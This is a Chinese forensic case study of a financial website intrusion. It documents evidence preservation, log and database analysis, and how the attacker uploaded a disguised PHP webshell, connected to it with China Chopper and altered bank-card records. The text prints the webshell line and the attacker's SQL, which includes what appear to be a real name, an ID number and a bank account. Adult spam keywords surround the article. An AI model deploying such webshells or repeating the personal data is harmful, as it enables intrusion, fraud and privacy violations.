亚洲免费av电影一区二区三区,日韩爱爱视频,51精品视频一区二区三区,91视频爱爱,日韩欧美在线播放视频,中文字幕少妇AV,亚洲电影中文字幕,久久久久亚洲av成人网址,久久综合视频网站,国产在线不卡免费播放

        ?

        計算機入侵事件中的取證方法探究

        2020-04-13 01:26:14錢志高
        關(guān)鍵詞:計算機數(shù)據(jù)庫用戶

        ◆錢志高

        (上海弘連網(wǎng)絡(luò)科技有限公司 上海 201101)

        1 事件簡介

        某金融網(wǎng)站稱:其注冊會員的賬戶內(nèi)的財產(chǎn),在用戶不知情的情況下被提現(xiàn),但網(wǎng)站查證后發(fā)現(xiàn)并不是用戶自身所為。值得注意的是,提現(xiàn)過程中使用的銀行卡并非是用戶名下真實存在的銀行賬戶。根據(jù)現(xiàn)有信息推測,其計算機可能被非法入侵,網(wǎng)站數(shù)據(jù)被篡改,損失達上百萬。

        2 數(shù)據(jù)固定

        數(shù)據(jù)固定是分析的前提,在固定過程中要兼顧數(shù)據(jù)原始性、完整性、可復(fù)現(xiàn),可控制的原則。以下對該Linux 服務(wù)器的固定過程進行詳細描述。

        2.1 目標信息

        網(wǎng)站部署在阿里云上,使用的是Linux 操作系統(tǒng),受害者提供了被入侵計算機的IP 和登錄憑據(jù),如圖1 所示:

        圖1 被入侵計算機的IP 和登錄憑據(jù)

        2.2 基本信息固定

        執(zhí)行“history > history.log”導(dǎo)出歷史命令;

        執(zhí)行“l(fā)ast > last.log”導(dǎo)出登錄相關(guān)信息;

        執(zhí)行“l(fā)astb > lastb.log”導(dǎo)出登錄失敗信息;

        執(zhí)行“l(fā)astlog > lastlog.log”導(dǎo)出所有用戶的最后一次登錄信息;

        執(zhí)行“tar czvf /var/log varlog.tar.gz”將/var/log 整個目錄打包;

        執(zhí)行“ps -AUX > ps.log”導(dǎo)出進程信息;

        執(zhí)行“netstat -atunp > netstat.log”導(dǎo)出網(wǎng)絡(luò)連接信息;

        2.3 網(wǎng)站數(shù)據(jù)固定

        (1)目錄固定

        根據(jù)網(wǎng)站應(yīng)用配置文件可知,網(wǎng)站目錄為“/www/c****i”,執(zhí)行“tar czvf /www/c*****i www.c*****i.com.tar.gz”將網(wǎng)站目錄保存;

        (2)訪問日志固定

        根據(jù)網(wǎng)站應(yīng)用配置文件可知,訪問日志保存位置在:“/etc/httpd/logs”,執(zhí)行“tar czvf /etc/httpd/logs accesslog.tar.gz”將網(wǎng)站訪問日志保存。

        為了確保日志的完整性,執(zhí)行此命令前應(yīng)該停止網(wǎng)站應(yīng)用進程,否則日志文件會因網(wǎng)站應(yīng)用進程鎖定日志而無法讀取。

        2.4 數(shù)據(jù)庫固定

        (1)數(shù)據(jù)表固定

        在網(wǎng)站目錄內(nèi)找到數(shù)據(jù)庫連接配置文件,將網(wǎng)站數(shù)據(jù)庫導(dǎo)出為“database.sql”。

        (2)數(shù)據(jù)庫日志固定

        根據(jù)Mysql 數(shù)據(jù)庫配置信息,將所有日志文件進行提取固定。

        3 數(shù)據(jù)分析

        3.1 系統(tǒng)日志分析

        固定工作完成后,首先對固定的基本信息進行分析,未發(fā)現(xiàn)明顯異常,排除暴力破解系統(tǒng)用戶登錄的入侵方式。

        3.2 網(wǎng)站應(yīng)用分析

        (1)網(wǎng)站重構(gòu)

        安裝Apache、PHP 和Mysql,將固定的數(shù)據(jù)導(dǎo)入,使用Web 瀏覽器訪問后,網(wǎng)站首頁成功展示。

        (2)WebShell 掃描

        使用WebShell 分析工具執(zhí)行掃描,在網(wǎng)站目錄下發(fā)現(xiàn)一個名為“upload****.php.bmp”的疑似網(wǎng)頁木馬的文件。

        (3)WebShell 分析

        使用編碼工具查看該文件后,發(fā)現(xiàn)存在以下代碼

        “<?php @assert(base64_decode($_POST[h3len]))?>”

        其含義是對post 提交的h3len 變量中的內(nèi)容執(zhí)行 base64 解碼。

        根據(jù)文件修改時間查找近似的文件,定位到符合條件的php 代碼頁“adminer.php”,打開發(fā)現(xiàn)此頁面的功能為數(shù)據(jù)庫管理器,可以執(zhí)行數(shù)據(jù)庫管理動作,如圖2。

        圖2 數(shù)據(jù)庫情況

        通常情況下,網(wǎng)站管理員并沒有在Web 頁上修改數(shù)據(jù)庫的需求,結(jié)合文件創(chuàng)建時間分析,可以確定此頁面是入侵者為了遠程操控數(shù)據(jù)庫而特意留下的接口。

        3.3 網(wǎng)站訪問日志分析

        接下來從網(wǎng)站的訪問日志入手,在日志中篩選出所有“adminer.php”頁面的訪問記錄,并統(tǒng)計所有“adminer.php”頁面訪問記錄中出現(xiàn)的“user_id”,得到4 個用戶的ID:

        “$ grep -E -i -o "user_id%5d=[e-9]{1,8} "adminer.php. exclude.alibaba.log | sort | uniq

        user_id%5D=1392

        user_id%5D=1679

        user_id%5D=2613

        user_id%5D=6248”

        3.4 數(shù)據(jù)庫及日志分析

        根據(jù)網(wǎng)站訪問日志分析結(jié)果可知,來自不同IP 地址的訪問者,利用數(shù)據(jù)庫管理接口訪問過多個數(shù)據(jù)表內(nèi)容,但無法確認是否執(zhí)行了修改動作。需要結(jié)合數(shù)據(jù)庫以及其日志來確認入侵者具體進行了哪些行為。

        (1)篩選受影響用戶信息

        首先使用SQL 語句查詢相關(guān)表,篩選受影響用戶信息然后篩選用戶提現(xiàn)記錄(圖3);

        圖3 篩選用戶信息

        (2)其次篩選4 個涉案user_id 操作日志,節(jié)選部分日志如下:

        update `dw_user` set password='827ccb0eea8a706c4c34a16 891f84e7b',

        paypassword='827ccb0eea8a706c4c34a16891f84e7b',realna me='康靜',sex='2',card_id='630104197409032543',

        --更新用戶2613 信息(dw_user 表)

        update `dw_account_cash` set bank=302,

        account='6217000010048063385',branch='北京豐臺萬年花城支行' where user_id=2613 --更新用戶2613 銀行卡提現(xiàn)信息(dw_account_cash 表) delete from dw_account_log where user_id=2613 AND i d>81869

        --刪除用戶2613 的歷史提現(xiàn)記錄(dw_account_log 表)

        insert into `dw_account_log` set `addtime` = '142768068 0',`addip` = '101.81.103.24',`user_id` = '2613',`type` = 'recharg e_success',`money` = '101675.00',`total` = '0',`use_money` = '0.00',`no_use_money` = '0',`collection` = '0.00',`to_user` = '0',`re mark` = '提現(xiàn)成功'

        --插入一條提現(xiàn)申請記錄 通過上述4 條操作記錄可以看出,嫌疑人通過修改數(shù)據(jù)庫中用戶信息、提款人銀行卡信息,再通過系統(tǒng)提現(xiàn)功能將錢轉(zhuǎn)入嫌疑人設(shè)定的銀行卡中。

        至此,入侵后對數(shù)據(jù)庫執(zhí)行的操作已經(jīng)明確,嫌疑人相關(guān)信息和涉案銀行卡也已水落石出。

        4 入侵還原

        根據(jù)數(shù)據(jù)分析環(huán)節(jié)結(jié)果,接下來對整個入侵過程進行還原。

        4.1 惡意文件上傳

        入侵者首先利用網(wǎng)站的文件上傳漏洞,將含有惡意內(nèi)容的PHP 代碼頁,修改文件頭部,偽裝成BMP 圖片,成功繞過網(wǎng)站代碼檢測機制,并上傳至網(wǎng)站的目錄下;

        4.2 確認上傳文件證據(jù)

        在網(wǎng)站對應(yīng)目錄找到上傳成功的惡意代碼文件“uploaddyp2p.php.php”,可見上傳行為有效;

        4.3 連接計算機

        使用“chopper”工具連接此網(wǎng)站內(nèi)的惡意代碼頁,連接成功后使用集成的文件管理器成功打開網(wǎng)站所在計算機的根目錄,并獲得管理權(quán)限;

        4.4 上傳數(shù)據(jù)庫管理器

        使用“chopper”工具集成的文件管理器,上傳數(shù)據(jù)庫管理器代碼頁“adminer.php”,讀取數(shù)據(jù)庫連接配置文件“/data/www/c*****i/dbconfig.php”,取得數(shù)據(jù)庫權(quán)限(圖4);

        圖4 獲取數(shù)據(jù)庫權(quán)限

        4.5 修改數(shù)據(jù)

        訪問“adminer.php”頁,篡改數(shù)據(jù)庫數(shù)據(jù),綁定銀行卡;

        4.6 執(zhí)行提現(xiàn)

        訪問提現(xiàn)頁,執(zhí)行提現(xiàn)操作,成功將用戶財產(chǎn)非法獲取。

        5 結(jié)束語

        本文通過數(shù)據(jù)固定、網(wǎng)站重構(gòu)、日志分析和入侵還原等取證方法,客觀地重現(xiàn)了一次Linux 計算機入侵事件。入侵者使用成熟的入侵手段,一步一步將對方計算機掌控,極大的危害了公共計算機的安全,使受害者蒙受了巨大的損失。

        計算機安全防護,尤其是公共計算機的安全防護,向來都是一項復(fù)雜的工程,涉及技術(shù)、設(shè)備、管理和制度等多方面的因素,單一的防護技術(shù)都有其局限性。需要綜合各種計算機網(wǎng)絡(luò)信息系統(tǒng)安全技術(shù),將病毒防護技術(shù)、入侵檢測技術(shù)、安全掃描技術(shù),入侵預(yù)警技術(shù)等結(jié)合起來,才能形成一套完整的、協(xié)調(diào)一致的網(wǎng)絡(luò)安全防護體系。

        在網(wǎng)絡(luò)安全防護中,最關(guān)鍵的因素是人。我們不能僅依靠殺毒軟件、防火墻、漏洞檢測等設(shè)備的防護,安全保護的對象是計算機,而安全保護的主體則是人,應(yīng)重視樹立人的計算機安全意識,提高網(wǎng)絡(luò)安全,降低事故發(fā)生,任重而道遠。

        猜你喜歡
        計算機數(shù)據(jù)庫用戶
        計算機操作系統(tǒng)
        基于計算機自然語言處理的機器翻譯技術(shù)應(yīng)用與簡介
        科技傳播(2019年22期)2020-01-14 03:06:34
        信息系統(tǒng)審計中計算機審計的應(yīng)用
        數(shù)據(jù)庫
        財經(jīng)(2017年2期)2017-03-10 14:35:35
        關(guān)注用戶
        商用汽車(2016年11期)2016-12-19 01:20:16
        關(guān)注用戶
        商用汽車(2016年6期)2016-06-29 09:18:54
        數(shù)據(jù)庫
        財經(jīng)(2016年15期)2016-06-03 07:38:02
        關(guān)注用戶
        商用汽車(2016年4期)2016-05-09 01:23:12
        數(shù)據(jù)庫
        財經(jīng)(2016年3期)2016-03-07 07:44:46
        數(shù)據(jù)庫
        財經(jīng)(2016年6期)2016-02-24 07:41:51
        成h视频在线观看免费| 制服丝袜天堂国产日韩| 免费一级国产大片| 伊人狼人激情综合影院| 亚洲人不卡另类日韩精品| 日本av第一区第二区| 亚洲国产最新免费av| 亚洲自偷自拍另类第1页| 国产高清在线精品一区| 韩国19禁主播深夜福利视频| 亚洲欧美国产精品久久久| 国产丝袜一区丝袜高跟美腿| 美女内射毛片在线看免费人动物 | 日韩精品极品视频在线观看免费| 国产看黄网站又黄又爽又色| 国产婷婷丁香久久综合| 国产精品成人久久一区二区| 日本一区二区三区人妻| 国偷自产一区二区免费视频| 一区二区日韩国产精品| 有码中文字幕一区二区| 日本免费播放一区二区| 亚洲国产精品日本无码网站 | 免费人成黄页网站在线观看国内| 国产激情自拍在线视频| 日产精品99久久久久久| 女厕厕露p撒尿八个少妇| 国产精品1区2区| 亚洲国产女同在线观看| 伊人大杳焦在线| 国语对白做受xxxxx在线中国| 久久亚洲中文字幕精品一区四 | 亚洲一区二区三区18| 亚洲国产综合久久天堂 | 国产婷婷色一区二区三区深爱网| 国产一区二区内射最近更新| 精品欧美乱码久久久久久1区2区| 国产精品欧美视频另类专区| 亚洲天堂亚洲天堂亚洲色图| 国产后入又长又硬| 日本夜爽爽一区二区三区|